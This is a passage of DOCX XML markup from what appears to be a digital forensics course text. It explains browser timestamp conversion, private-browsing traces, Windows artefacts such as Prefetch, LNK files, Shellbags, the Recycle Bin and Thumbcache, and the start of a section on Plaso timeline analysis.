        </w:rPr>
        <w:t xml:space="preserve">Browser timestamps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chrome and Edge store time as the number of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">microseconds since 1 January 1601 (UTC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WebKit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> format. Firefox uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">microseconds since 1 January 1970 (UTC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the Unix epoch. Tools convert them automatically, but an investigator should know how to do it manually.</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Converting a WebKit timestamp</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Given: 13350000000000000 (WebKit).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 1: divide by 1,000,000 → 13,350,000,000 seconds since 1601.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="70" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 2: subtract 11,644,473,600 seconds (the gap between 1601 and 1970) → 1,705,526,400 Unix seconds.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Step 3: convert → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">17 January 2024, 21:20:00 UTC</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">.</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Private browsing</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">In </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Incognito/Private</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> mode the browser does not save history or cookies on disk after the session ends. However, traces may still remain in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">DNS cache, RAM, the pagefile, router/proxy logs and downloaded files</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Absence of history does not prove that nothing was visited.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 Other Windows Artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prefetch files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prefetch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Windows feature that speeds up application start by recording which files a program loads. For forensics, it is valuable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">proof that a program was executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Files are stored as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\Prefetch\PROGRAMNAME.EXE-&lt;hash&gt;.pf</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Shows the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">program name and path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">number of times it was run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">last run time(s)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (up to the last eight times on Windows 8 and later).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists files and folders the program accessed in its first seconds — useful to link a program with documents or drives.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The prefetch file’s own </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">creation time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is close to the first execution, and its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">modified time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the last execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence remains even if the program was later deleted, so it can reveal use of hacking or wiping tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Enabled by default on Windows workstations, but often disabled on servers; may be limited on SSD systems. Parse with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PECmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">LNK (shortcut) files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a user opens a file, Windows automatically creates a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">shortcut (.lnk)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Users\&lt;user&gt;\AppData\Roaming\Microsoft\Windows\Recent\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The LNK contains information about the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">target file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: its full path, size, its created/modified/accessed times, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">volume serial number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and drive type (fixed, removable, network), and the computer name. Hence, an LNK can prove that a file was opened from a USB drive or a network share even if the file is gone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellbags</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellbags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are registry entries (in NTUSER.DAT and UsrClass.dat) that remember the view settings of folders a user browsed in Windows Explorer. As a side effect they keep a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">record of folders that the user visited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — including folders on removable drives, network shares and folders that have since been deleted. Shellbags show that a person </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">browsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a folder, even if no file was opened. They are read with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ShellBags Explorer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Jump Lists, Recycle Bin and Thumbcache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3703"/>
        <w:gridCol w:w="3606"/>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Artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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Location / structure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Evidence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Jump Lists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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…\Recent\AutomaticDestinations and CustomDestinations</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Recently used files per application (e.g. last documents opened in Word)</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Recycle Bin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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C:\$Recycle.Bin\&lt;user SID&gt;\ — </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$I…</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> file (metadata) and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">$R…</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> file (data)</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 holds the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">original path, size and deletion time</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; $R holds the content. Shows what the user deleted and when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Thumbcache</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="370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…\AppData\Local\Microsoft\Windows\Explorer\thumbcache_*.db</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Small previews of images and videos that were viewed — may remain after the originals are deleted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.6 Timeline Analysis with log2timeline / Plaso</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timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> arranges events from many sources in order of time. A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">super timeline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
